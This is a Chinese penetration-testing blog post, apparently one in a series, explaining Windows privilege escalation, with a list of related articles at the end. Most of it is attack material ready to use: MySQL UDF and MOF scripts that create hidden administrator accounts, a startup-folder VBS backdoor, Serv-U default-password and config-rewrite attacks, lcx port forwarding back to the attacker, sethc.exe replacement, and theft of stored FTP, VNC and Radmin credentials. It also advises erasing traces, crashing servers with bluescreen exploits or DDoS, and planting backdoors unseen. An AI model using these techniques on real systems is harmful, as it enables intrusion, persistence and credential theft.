windows基础命令

systeminfo | findstr OS         **#获取系统版本信息**
hostname                         **#获取主机名称**
whomai /priv                         **#显示当前用户的安全特权**
quser or query user             **#获取在线用户**
netstat -ano | findstr 3389      **#获取rdp连接来源IP**
dir c:\programdata\ **#分析安装杀软**
wmic qfe get Caption,Description,HotFixID,InstalledOn   **#列出已安装的补丁**
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber   **#获取远程端口**
tasklist /svc | find "TermService" + netstat -ano    **#获取远程端口**

windows提权技术分类大概分为三种：

一、系统溢出漏洞提权
二、数据库提权
三、第三方软件提权

windows常见提权

（一）本地提权

1.溢出提权

系统溢出漏洞提权分为两类

1.远程溢出
2.本地溢出

（A）远程溢出

远程溢出提权是指攻击者只需要与服务器建立连接，
然后根据系统的漏洞，使用响应的溢出程序，
即可获取到远程服务器的root权限。ps:
攻击者在攻击服务器时，使用远程溢出这种溢出攻击这种攻击手段是比较少的，
服务器通常都打了漏洞补丁，这样旧的溢出漏洞一般不会再起作用，
而新的溢出漏洞少之又少，可以说远程溢出漏洞已经"日落西山"了。

（B）本地溢出

本地溢出提权首先要有服务器的一个用户，且需要有执行的权限的用户才能发起提权，
攻击者通常会向服务器上传本地溢出程序，在服务器端执行，
如果系统存在漏洞，那么将溢出root权限ps
EXP = Exploit的中文意思是“漏洞利用”。
意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码，
可以使得读者完全了解漏洞的机理以及利用的方法。

2.Getpass提权

3.hash传递入侵

简单点说,哈希传递就是用户登录的时候使用密码的哈希值代替密码来完成认证.
很多windows的协议都是需要用户提供他们的密码哈希值,并不一定非得需要用户提供密码.
这一点在渗透测试过程中非常重要,因为发现用户的密码哈希比发现用户的密码容易多了.
对于8.1版的RDP大部分情况下都需要用户提供他们的密码.
但是有一个例外,那就是受限管理员模式,这种情况下用户可以使用他们的密码哈系来登录.

4.lpk提权

ipk提权就是利用lpk TOOls工具生成lpk.dll，将lpk.dll上传到目标服务器带有exe的目录下，
当exe被执行后，就会动态链接lpk.dll，映像劫持技术。
shift后门（连续按5次shift，然后按设定好的案件，就会出现界面，输入密码就可以使用）ps:关于lpk病毒
系统本身的lpk.dll文件位于C:\WINDOWS\system32和C:WINDOWS\system\dllcache目录下。
lpk.dll病毒的典型特征是感染存在可执行文件的目录，并隐藏自身，删除后又再生成，
当同目录中的exe文件运行时，lpk.dll就会被Windows动态链接，从而激活病毒，进而导致不能彻底清除。

（二）数据库提权

1.mysql提权

mysql提权我们可以分为3类：功能型、技巧型、漏洞型
功能型：udf提权
技巧型：启动项提权
漏洞型：mof提权

（A）udf提权

首先我们搞清楚udf是什么

udf = ‘user defined function‘，即‘用户自定义函数’。是通过添加新函数，对MYSQL的功能进行扩充，
性质就象使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中，
存在于‘mysql/lib/plugin’目录下，文件后缀为‘.dll’，常用c语言编写。

如何使用udf

假设我的udf文件名为‘udf.dll’，存放在Mysql根目录(通过select @@basedir可知)的‘lib/plugin’目录下。
在udf中，我定义了名为sys_eval的mysql函数，可以执行系统任意命令。如果我现在就打开mysql命令行，
使用select sys_eval(‘dir‘);的话，系统会返回sys_eval()函数未定义。
因为我们仅仅是把‘udf.dll’放到了某个文件夹里，并没有引入。类似于面向对象编程时引入包一样，
如果没有引入包，那么这个包里的类你是用不了的。
所以，我们应该把‘udf.dll’中的自定义函数引入进来。
不要慌，看看实例用法：
CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘udf.dll‘;
只有两个变量，一个是function_name（函数名），我们想引入的函数是sys_eval。还有一个变量是shared_library_name（共享包名称），即‘udf.dll’。至此我们已经引入了sys_eval函数，下面就是使用了。
这个函数用于执行系统命令，用法如下：
select sys_eval(‘cmd command‘);

使用udf提权

现在我们已经知道了udf是什么，以及如何引入udf。下面我们要关注的就是提权了。其实到这里，提权已经结束了，因为对于sys_eval()函数，其中的指令是直接以管理员的权限运行的，所以这也就是最高权限了。
下面来整理一下思路：将udf文件放到指定位置（Mysql>5.1放在Mysql根目录的lib\plugin文件夹下）从udf文件中引入自定义函数(user defined function)执行自定义函数先看第一步，拿到一个网站的webshell之后，在指定位置创建udf文件。如何创建？先别忘了，现在连源udf文件都没有。sqlmap中有现成的udf文件，分为32位和64位，一定要选择对版本，否则会显示：Can‘t open shared library ‘udf.dll‘。获取sqlmap的udf请看链接：MySQL 利用UDF执行命令/52413974然后将获得的udf.dll文件转换成16进制，一种思路是在本地使用mysql函数hex：SELECT hex(load_file(0x433a5c5c55736572735c5c6b61316e34745c5c4465736b746f705c5c6c69625f6d7973716c7564665f7379732e646c6c)) into dumpfile ‘C:\\Users\\ka1n4t\\Desktop\\gg.txt‘;load_file中的十六进制是C:\\Users\\ka1n4t\\Desktop\\lib_mysqludf_sys.dll此时gg.txt文件的内容就是udf文件的16进制形式。接下来就是把本地的udf16进制形式通过我们已经获得的webshell传到目标主机上。1. CREATE TABLE udftmp (c blob); //新建一个表，名为udftmp，用于存放本地传来的udf文件的内容。
2. INSERT INTO udftmp values(unhex(‘udf文件的16进制格式‘)); //在udftmp中写入udf文件内容
3. SELECT c FROM udftmp INTO DUMPFILE ‘H:\\PHPStudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll‘; //将udf文件内容传入新建的udf文件中，路径根据自己的@@basedir修改
//对于mysql小于5.1的，导出目录为C:\Windows\或C:\Windows\System32\上面第三步，mysql5.1以上的版本是默认没有plugin目录的，网上有说可以使用ntfs数据流创建：select test into dumpfile‘H:\\PHPStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION‘;但是我本地测试一直没有成功。后来又在网上看了很多，都是用这种方法，看来是无解了。在t00ls上也有人说数据流从来没有成功过，所以说mysql5.1以上的提权能否成功还是个迷。
为了演示，在这里我是手工创建了个plugin目录(ps: 勿喷啦，我用的phpstudy环境，重新安装一个mysql的话有可能会冲突，所以就没搞，毕竟原理都一样)。继续，到这儿如果没有报错的话就说明已经在目标主机上成功生成了udf文件。下面要导入udf函数：1. DROP TABLE udftmp; //为了删除痕迹，把刚刚新建的udftmp表删掉
2. CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘udf.dll‘; //导入udf函数导入成功的话就可以使用了：SELECT sys_eval(‘ipconfig‘);
返回网卡信息附几个常用的cmd指令，
用于添加一个管理员用户：
net user ka1n4t ka1n4t~!@ /add             //添加新用户：ka1n4t，密码为ka1n4t~!@
net localgroup administrators ka1n4t /add              //将ka1n4t添加至管理员分组

（B）启动项提权

启动项提权就是将一段 VBS脚本导入到  C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下，
如果管理员重启了服务器，那么就会自动调用该脚本，并执行其中的用户添加及提权命令！

1. 如果  C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限，那么我们可以直接将 VBS 提权脚本上传到该目录下！VBS 提权脚本代码如下：setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”secist”)
od.SetPassword “secist.com”
od.SetInfo
Set of=GetObject(os&“/secist”,user)
oe.add os&“/secist”将以上代码保存为 .vbs 后缀的文件上传即可！2. 通过大马的MySQL执行功能，利用SQL命令来进行VBS脚本的创建及添加。create table secist(cmd text);insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动
\secist.vbs”;成功执行以上命令后，只要管理员重启了服务器，我们就可以成功提权了！温馨提示：
1.关于重启目标服务器，我们可以利用一些可导致服务器蓝屏的EXP，或者DDoS拒绝服务！
2.上传的目录必须具备可读写的权限！
3.调用的 cmd 也必须有足够的权限！

（C）mof提权

mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"
其作用是每隔五秒就会去监控进程创建和死亡。其就是用有了mysql的root权限了以后，
然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，
这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。

提权过程

将mof上传至任意可读可写目录下，这里我传到D:\wamp\下命名为：litbai_zhang.mof。
也就是：D:\wamp\litbai_zhang.mof然后使用sql语句将系统当中默认的nullevt.mof给替换掉。
进而让系统执行我们这个恶意的mof文件。
替换的sql语句：
select load_file(';D:\wamp\litbai_zhang.mof';) into dumpfile ';c:/windows/system32/wbem/mof/nullevt.mof';;
mof文件代码如下所示：==========================================#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter
{ EventNamespace = "Root\\Cimv2"; Name  = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";
}; instance of ActiveScriptEventConsumer as $Consumer
{ Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
}; instance of __FilterToConsumerBinding
{ Consumer   = $Consumer; Filter = $EventFilter;
};===================================================
可见其中是有一段添加用户的脚本。账号为admin 密码为admin

（三）第三方软件提权

1、FTP提权

FTP提权分为serv-u提权G6-FTP提权FileZilla提权FlashFXP提权PcAnywhere提权Xlight FTP Server提权

========================================================

Serv-u提权

主要提权方法：

一、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下 比如是d盘
3、执行命令 d:\serv_u.exe
4、d:\serv_u.exe “net user username password /add” (注意命令要有引号)
5、d:\serv_u.exe “net localgroup administrators username /add” (注意命令要有引号)

二、ServUDaemon.ini 文件重写后提权(对ServUDaemon.ini有写入的权限)。注意，我在serv-u6.4.06中测试没有成功，即虽然FTP用户添加成功，但添加的用户没有命令执行权限（虽然显示添加的用户是管理员用户）。所以，在实际环境中本方法不一定成功，不过要尝试以下。先修改Domain来添加用户[Domain1]User2=spider|1|0然后在ServUDaemon.ini文件尾部追下如下代码来添加用户的详细信息：[USER=spiger|1]
Password=sbd8b58b5c201ee5cc20f9a8551197d4a5
HomeDir=c:\
RelPaths=3
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
SKEYValues=
添加上述代码并保存后，就会在serv-u中添加用户名为spiger，密码是123456。通过在本地命令行执行ftp 目标IP地址  命令来连接目标FTP服务器。
连接后quote site exec net user spiger 123456 /add
quote site exec net localgroup administrators spiger /addps：上述添加的文件中最重要的是Maintenance=System这句，有了这句添加的FTP用户才是管理员用户，才会有命令执行权限（因为最后是通过FTFP执行命令来添加系统用户的）。

三、serv-u配置文件无修改权限，但是可以看到配置文件，进行口令破解看到FTP用户的配置文件ServUDaemon.ini，在其中找到Maintenance=System的用户，该用户就是系统管理员。如果能够成功破解系统管理员的口令，就可以利用该管理员执行添加系统管理员的用户（类似方法二）。serv-u配置文件中Password字段就是用户口令加密变换后的字符串，破解方法：去掉前两位，剩下的进行md5破解，破解后再去掉前两位，剩下的就是FTP用户口令。

四、serv-u配置文件无修改权限，可以用Serv-u管理用户来进行提权（这是最常用的方法，一般大马中集成的serv-u提权方法就是本方法）serv-u的默认管理端口是43958，只有本地才能进行连接这个管理端口。serv-u默认管理账号是LocalAdministrator,默认密码是”#l@$ak#.lk;0@P“，这个密码是固定的。如果网站管理员忘记修改密码，那么获取webshell后就可以连接该端口后执行命令来添加系统用户。    虽然，网站管理员很少修改serv-u的这个默认管理账号和口令，但是如果管理员修改了，我们还可以通过查看ServUAdmin.exe文件来获取管理账号和口令。方法如下：下载serv-u目录下的ServUAdmin.exe文件，在本地用文本文件打开，查找LocalAdministrator字符来获取口令位置，通常可以看到serv-u的管理账号和口令都在文件中，仔细查找即可（如果连用户名也修改了，就搜127.0.0.1或记住账号和密码在文件中的位置）。获取管理账号和口令后就可以利用大马自带的serv-u来进行提权了。

五、serv-u ftp转发端口上一种方法中提到serv-u的本地管理账号只能本地进行连接，但我们可以利用端口转发的方式来将其管理端口转发的本地，进而提权。在目标Webshell上运行LCX：lcx -slave 你的IP 5000 127.0.0.1 43958
在本机上运行：lcx -listen 5000 21打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P此时的连接过程是：本机连接21端口——>转发往本机5000端口——>管道连接至远程机5000端口——>转发至远程43958端口连接成功后，在本机登陆Serv_U就相当于登陆了远程的Serv_U。你可以FTP登陆本机IP,输入上面的帐号和密码，在远程FTP服务器上执行命令。——————————————————————————————-上面是serv-u6及以下的主要方法，其中方法也适用于servu-7等版本，只是文件路径可能有所变化。下面讲serv-u7及以上版本的提权，不适用于serv-u6是因为文件路径发生变化，serv-u6没有相应文件。serv-u7中管理员的口令在C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive文件中，破解方法和serv-u6是一样的。

======================================

G6-FTP提权

Gene6 FTP Server提权方法
Gene6 FTP Server这个FTP软件简单易用,比SU的安全性高的多.
他的默认管理端口是8021,只允许本机计算机连接.外部计算机即使你得到管理帐号你也不能登陆进去.
这一点和我们的SU一样,SU的管理端口是43958.
Gene6 FTP Server的帐户配置文件在:C:Program FilesGene6 FTP ServerRemoteAdminRemote.ini;
如果不在请自己手动查找.具体的不再废话.
[Server]
IP=127.0.0.1,8021 这个是本地管理IP 和默认管理的端口,端口是可以修改的.
GrantAllAccessToLocalHost=0
[Acct=Administrator] 管理帐户
Enabled=1
Rights=0
Password=202CB962AC59075B964B07152D234B70 管理帐户的密码的MD5的加密字符串
[Acct=124] 这个是普通帐号,注意Acct=124这个帐号不是124,而是24;124中的1代表第一个帐号.
Enabled=1
Password=C8FFE9A587B126F152ED3D89A146B445 MD5的加密字符串,可以去破解出密码的明文.
Domain=
RootFolder=
Rights=0
IPAccessList=
我们得到管理密码后如何才能登陆上去管理呢? 我们可以用HTRAN的端口转发功能,把默认管理端口转发到其他端口,
然后进行连接.我们本地事先也安装一个Gene6 FTP Server软件.然后配置.
新建一个远程FTP管理

HOST那里输入你要提权的IP
PORT输入你用端口转发工具转发的端口,
USERNAME和PASSWORD输入Gene6 FTP Server的帐户配置文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的.
不出意外我们就可以连接上去了.我们可以新建一个普通的帐号.
我这里建一个名为msnhack密码为manhack的帐号然后选择好管理目录,然后我们在权限配置那里配置好权限.可以全部选上…

这样还不能提权.这里到了我们最核心的一步.
1.写一个能执行命令的批处理文件,并上传到目标主机.
@echo off
net user hack hack /add
net localgroup administrators hack /add
2.然后在SITE COMMANDS那个地方再进行配置.

COMMAND那输入你的命令执行的名字.我写的是HACK DESCRIPTTION这个是写描述的.这里随便你写什么都可以的.
EXECUTE这里输入你的BAT的命令执行文件的路径.也就是你刚上传的那个文件的路径.点OK就可以了.现在我们来看下我们本地的帐号情况.

只有两个帐号.现在我们登陆FTP进行提权操作.输入提权命令 “quote site hack”

200 Command executed 命令成功执行.
我们来看下加上帐号没有.

已经多了一个HACK的帐号,权限为管理权限.提升权限已经成功.

============================================

FileZilla提权

利用现有的system权限的程序Filezilla来获得权限。
Filezilla和普通Web网站一样，前台有普通FTP账户执行上传、下载、删除等动作，后台则有一个管理员控制台来设置前台的账户以及账户的权限。
前台就是21端口，而后台默认是14147端口。我们的提权方式就是，直接非法连接14147端口，非法登录远程的Filezilla，创建一个拥有全部硬盘目录权限的FTP账户。
确认服务器运行了Filezilla，并且开启了14147端口，步骤如下：

第一步，找Filezilla目录，找不到的话就猜吧，猜不到就是无权了。
我直接打包了Filezilla整个目录下载下来，在远程独立ip的服务器运行，连接端口由14147改为4444第二步，在独立ip的服务器上运行lcx监听并转发端口
lcx -l 3333 4444
现在将服务端的14147端口转发到lcx监听的3333端口上

第三步，在独立ip服务器上运行Filezilla，连接端口为4444

注意，我这里的配置文件是直接下载的，有很多时候服务端会连不上，是因为自己的Filezilla和服务端的Filezilla版本不一致。
为了避免这个问题，我把服务器上的Filezilla整目录打包下来运行了，所以不用解密码。
这里的密码是自己读的。

第四步，使用Filezilla创建一个拥有C盘权限的账户，读写创建删除的权限都要有。

如果网速不稳定等造成账户创建失败，可以选中一个选项就确认一次，然后重新打开设置卡再选中下一个选项。

这样我就成功的加上了C盘权限的Filezilla账户现在只要连接上FTP，然后替换掉sethc.exe以后，3389连接，5下shift就可以登陆了。

另外我要补充一点：
FTP分为主动连接和被动连接，不懂得可以上网查查资料。
我要说的是，FFilezilla的21端口是不能被转发出来的，将21端口转发出来以后，被动连接就会变成主动连接，Filezilla是不支持主动连接的。将21端口转发出来以后就会发生积极拒绝的情况：

504 MODE Z not enabled
这个错误回显就是了。有些人把linux的21端口出于安全考虑转发到高端口也会发生这种情况。

=====================================

FlashFXP提权

利用FlashFXP替换文件漏洞，可以读取管理员连接过的站点账户密码信息。

思路：下载flashfxp下的配置文件（quick.dat）覆盖到本地，然后星号查看器查看出密码。
flashfxp默认安装目录：c:\Program Files\flashfxp
在其安装目录中找到以下文件并予以下载quick.dat
然后本机下载且安装flashfxp，将以上三个文件放置于本件安装安装flashfxp目录下，会提示已经有了是否覆盖，直接点击确定覆盖。然后再次打开flashfxp快速连接，在历史的那里就直接有目标机的地址了。账号轻而易举的获得（用星号查看器），如此便OK。可以尝试ftp密码当作3389的密码登录试试。

=============================

PcAnywhere提权

在早期的入侵提权中，我们经常可以看到使用利用安装PcAnywhere的服务器下载cif文件，然后使用明小子或者其他专用的密码读取工具进行读取控制密码的提权方法。这个应该算是PcAnywhere的一个硬伤了。而通常这个文件存在的目录是“C:\Documents and Settings\All Users\Application\Data\Symantec\pcAnywhere”guest权限对该目录是具有访问权限的。所以就可以下载cif配置文件进行读取，然后本地连接进行提权。
但是这一方法在最新的12.1版本中，已经不可以了。我们再去下载该cif文件，用密码读取工具是读不到密码的，即使可以读得到，也是乱码。但是通过浏览安装目录，我们可以发现。在PcAnywhere的“C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere”路径下，会有一个名称为“Hosts”的文件夹。在这个里面同样存储了一个cif文件。我们就是通过本地配置一个可控的服务端，然后在本地生成这样一个cif文件，然后将他覆盖保存于网站服务器的目录下，就可以使用本地的密码进行连接了。可喜的是，默认安装状态下，Windows2003中这个目录是Everyone具有完全控制权限的！这就为我们的提全铺平了最后一条路！
最后一点需要提到的就是，大家在入侵提权前，一定要下载保存原网站的cif文件。然后在上传覆盖本地的，入侵成功后留下后门在替换回来，以免被管理员发现。

2.远程软件提权

VNC提权

提权思路: 利用在安装VNC后会在注册表中保留VNC的密码，通过WEBSHELL远程读取HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 的密码信息并在本地编辑破解VNC密码来达到提权目的。
提权过程:
1.了解VNC占用端口号5900
2.学会使用VNC远程控制
3.本地破解密码
4.远程连接成功

============================

Radmin hash提权漏洞

radmin是平时在windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等特性。不过老版本的radmin server2.X、radmin server3.0都存在一个“致命”漏洞 —— radmin hash提权漏洞。
对于该“致命”漏洞我之所以加了引号。是因为该漏洞的利用是需要有一定的前提条件的。即：要获取读取系统注册表的权限（并不需要有写权限）。当然，获得此权限的方法很多。基本上取得webshell、cmdshell后都能获取该权限。

一、利用方法如果不怕麻烦的，可以看下红黑联盟上提供的一个利用OllyDBG进行hash欺骗的详细步骤 —— 反汇编破解Radmin密码实例。当然想省事也有省事的方法，网上早有人制作出radmin_hash版的viewer程序。从注册表的下列路径取得所要的hash值和端口值：

HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter//默认密码注册表位置 HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort //默认端口注册表位置

parameters下的配置大致如下所示：

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
“NTAuthEnabled”=hex:00,00,00,00
“Parameter”=hex:b5,bb,fc,50,93,ba,35,b0,7d,a6,57,f7,d6,f1,9a,a0
“Port”=hex:11,27,00,00
“Timeout”=hex:0a,00,00,00
“EnableLogFile”=hex:01,00,00,00
“LogFilePath”=“c:logfile.txt”
“FilterIp”=hex:00,00,00,00
“DisableTrayIcon”=hex:00,00,00,00
“AutoAllow”=hex:00,00,00,00
“AskUser”=hex:00,00,00,00
“EnableEventLog”=hex:00,00,00,00

有人会问，我如何知道。他用的端口是多少。很简单，自己电脑上装上一个同版本的radmin，注册表中找到相关的位置。将其中的端口的hex值改成和查到的一样，再查看自己的设置里的端口变成了多少。上例中所取的值11 27 00 00 即是10001端口。而通radmin_hash修改版输入32位hash值所就会连接上主机

连接完了以后，你就可以为所欲为了。可以利用mimikatz解析用户密码，也可以通过getpw获取用户的sam值，再通过LC5解密。获得密码后，可能通过远程桌面进行连结。（呵呵，多留一个后门总归是好的……）

张小白的渗透之路（十一）--windows提权详解相关推荐

张小白的渗透之路（二）——SQL注入漏洞原理详解
SQL注入漏洞简介乱七八糟的就不多说了,自己百度去 SQL注入原理想要更好的学习SQL注入,那么我们就必须要深入的了解每种数据库的SQL语法及特性.下面通过一个经典的万能密码的例子带大家来拨开一下 ...
张小白的渗透之路（五）——上传漏洞及解析漏洞详解
前言 web应用程序通常会有文件上传的功能,例如在BBS发布图片.在个人网站发布压缩包,只要web应用程序允许上传文件,就有可能存在文件上传漏洞. 上传漏洞与sql注射相比,风险更大,如果web应用程 ...
张小白的渗透之路（十）——业务逻辑漏洞
业务逻辑漏洞由于程序逻辑不严谨或逻辑太过复杂,导致一些逻辑分支不能正常处理或处理错误,统称为业务逻辑漏洞关注重点业务流程 HTTP/HTTPS 请求分析漏洞分类身份认证暴力破解在没有 ...
Windows提权基本原理，各位表哥了解下！
Windows提权基本原理没有多少人谈论在Windows下提权,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低权限shell. 在演示环境,你经 ...
使用MSF进行提权（windows提权、linux提权、wesng使用）
文章目录 MSF Windows提权反弹shell 提权 END推荐阅读 MSF Linux提权反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
Windows XP服务详解
Windows XP服务详解微软的个人操作系统从Win98发展到WinXP,为什么突然变得那么消耗系统资源呢?以至于很多人都感觉WinXP只是高配置的电脑才能运行的操作系统,其实不然.WinXP ...
（渗透测试后期）Linux进程隐藏详解
文章目录 (渗透测试后期)Linux进程隐藏详解前言 Linux进程基础 Linux进程侦查手段 Linux进程隐藏手段一.基于用户态的进程隐藏方法1:小隐隐于/proc/pid--劫持read ...
系统提权之：Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
Windows提权的几种姿势
想象这种画面:你拿到了一台机器上Meterpreter会话了,然后你准备运行 getsystem 命令进行提权,但如果提权没有成功,你就准备认输了吗?只有懦夫才会认输.但是你不是,对吗?你是一个勇者! ...

张小白的渗透之路（十一）--windows提权详解